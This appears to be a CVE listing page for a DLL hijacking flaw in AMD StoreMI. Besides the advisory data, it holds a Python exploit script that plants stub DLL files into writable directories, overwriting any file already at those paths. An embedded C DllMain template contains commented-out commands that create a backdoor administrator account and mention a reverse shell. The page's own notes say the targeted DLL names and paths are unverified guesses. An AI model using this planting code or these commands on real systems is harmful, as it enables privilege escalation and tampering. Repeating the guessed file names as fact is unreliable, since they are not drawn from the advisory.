Security Vulnerability Report
CVE-2024-21922 CVSS 7.3 HIGH

CVE-2024-21922

Published: 2025-11-23 17:15:47
Last Modified: 2026-04-15 00:35:42

Description

A DLL hijacking vulnerability in AMD StoreMI™ could allow an attacker to achieve privilege escalation, potentially resulting in arbitrary code execution.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AMD StoreMI < 2.0.0.0288
AMD StoreMI, certain earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-21922 DLL Hijacking PoC
# Target: AMD StoreMI
# This PoC demonstrates the DLL hijacking vulnerability
#
# NOTE(review): context for readers assessing exposure.
# - The advisory data on this page classifies the issue as CWE-426 (untrusted
#   search path) with vector AV:L/AC:L/PR:L/UI:R: a local, low-privileged
#   account plus a user action are required.
# - The page lists AMD StoreMI versions below 2.0.0.0288 as affected and
#   references vendor bulletin AMD-SB-4010 for remediation.
# - The advisory text on this page names no DLL and no directory. The file
#   names and paths used below are therefore unverified; confirm them against
#   the vendor bulletin before relying on them for detection rules.
# - Checks this listing suggests for defenders: verify that non-administrative
#   users cannot write to the StoreMI install directory, and monitor that
#   directory for DLLs created or modified outside an installer run.

import os
# ctypes, shutil and Path are imported but never used anywhere in this listing.
import ctypes
import shutil
from pathlib import Path

# Malicious DLL source code (to be compiled as DLL)
# This string is never referenced by the Python code below; nothing here
# compiles or writes it. In the C text, the only statements that are not
# commented out create C:\Temp\cve_2024_21922_poc.log and write a one-line
# marker into it when the DLL is attached to a process.
MALICIOUS_DLL_SOURCE = '''
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Create a backdoor or execute malicious code here
        // This code runs with AMD StoreMI's privileges

        // Example: Create admin user (for demonstration)
        // system("net user hacker P@ssw0rd123 /add");
        // system("net localgroup administrators hacker /add");

        // Log exploitation attempt
        HANDLE hFile = CreateFileA(
            "C:\\\\Temp\\\\cve_2024_21922_poc.log",
            GENERIC_WRITE,
            FILE_SHARE_WRITE,
            NULL,
            CREATE_ALWAYS,
            FILE_ATTRIBUTE_NORMAL,
            NULL
        );

        if (hFile != INVALID_HANDLE_VALUE) {
            const char* msg = "[+] CVE-2024-21922 DLL hijacking triggered\\n";
            DWORD written;
            WriteFile(hFile, msg, strlen(msg), &written, NULL);
            CloseHandle(hFile);
        }

        // Execute payload - reverse shell, privilege escalation, etc.
        // WinExec("cmd.exe /c whoami > C:\\\\Temp\\\\priv_esc.txt", 0);
    }
    return TRUE;
}
'''


def create_malicious_dll(dll_path):
    """Write a 64-byte placeholder file to ``dll_path``.

    The bytes written are 'MZ', 58 NUL bytes and 'PE\\0\\0'. They carry the
    two magic values but no PE headers or sections, so the result is a
    marker file rather than a loadable DLL. MALICIOUS_DLL_SOURCE is not
    used here.
    """
    print(f"[*] Creating malicious DLL at: {dll_path}")

    # In real scenario, compile the C code above as a DLL
    # For demonstration, create a placeholder
    # Mode 'wb' truncates: a file already present at dll_path is overwritten
    # with the stub, which would break a legitimate DLL of the same name.
    with open(dll_path, 'wb') as f:
        f.write(b'MZ' + b'\x00' * 58 + b'PE\x00\x00')

    print(f"[+] Malicious DLL created")


def find_vulnerable_location(storeMI_path):
    """Return the candidate paths whose parent directory is writable.

    Builds five hard-coded candidates (three under ``storeMI_path``, two
    under C:\\Windows\\System32) and keeps those for which os.access reports
    write permission on the containing directory for the current user. It
    does not check whether a file exists at the path or whether StoreMI
    ever loads it.
    """
    # NOTE(review): these names are not taken from the advisory text on this
    # page - treat as unverified. A non-empty result mainly shows that the
    # current account can write to the directory, which is itself worth
    # investigating as a permissions problem.
    vulnerable_paths = [
        os.path.join(storeMI_path, 'amdstorMI.dll'),
        os.path.join(storeMI_path, 'amdstoreMI.dll'),
        os.path.join(storeMI_path, 'StoreMI.dll'),
        'C:\\Windows\\System32\\amdstorMI.dll',
        'C:\\Windows\\System32\\amdstoreMI.dll'
    ]
    return [p for p in vulnerable_paths if os.access(os.path.dirname(p), os.W_OK)]


def exploit_cve_2024_21922(storeMI_path, target_dll):
    """
    CVE-2024-21922 Exploitation Script

    Attack Vector:
    1. Identify AMD StoreMI installation directory
    2. Plant malicious DLL with legitimate DLL name
    3. Wait for user to launch AMD StoreMI
    4. Malicious DLL loads with elevated privileges

    Returns False when find_vulnerable_location yields nothing, otherwise
    True after a placeholder has been written to every returned path.
    ``target_dll`` is accepted but never read in the body.
    """
    print("[*] CVE-2024-21922 DLL Hijacking PoC")
    print("[*] Target: AMD StoreMI")

    # Step 1: Find vulnerable locations
    vulnerable_locs = find_vulnerable_location(storeMI_path)

    if not vulnerable_locs:
        print("[-] No writable DLL locations found")
        return False

    print(f"[+] Found {len(vulnerable_locs)} potential injection points")

    # Step 2: Create malicious DLL
    # Every writable candidate receives the placeholder, not only one path.
    for loc in vulnerable_locs:
        print(f"[*] Attempting injection at: {loc}")
        create_malicious_dll(loc)
        print(f"[+] Malicious DLL planted at {loc}")

    # The messages below describe the intended scenario; what was written is
    # the 64-byte stub from create_malicious_dll, which contains no payload.
    print("[+] PoC complete - malicious DLL(s) planted")
    print("[*] Payload will execute when AMD StoreMI is launched")
    return True


if __name__ == "__main__":
    # Default AMD StoreMI installation path
    default_path = r'C:\Program Files\AMD\AMD StoreMI'
    # Passed through to exploit_cve_2024_21922, which does not use it.
    target_dll = 'amdstorMI.dll'

    exploit_cve_2024_21922(default_path, target_dll)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-21922", "sourceIdentifier": "[email protected]", "published": "2025-11-23T17:15:46.817", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A DLL hijacking vulnerability in AMD StoreMI™ could allow an attacker to achieve privilege escalation, potentially resulting in arbitrary code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}]}], "references": [{"url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-4010.html", "source": "[email protected]"}]}}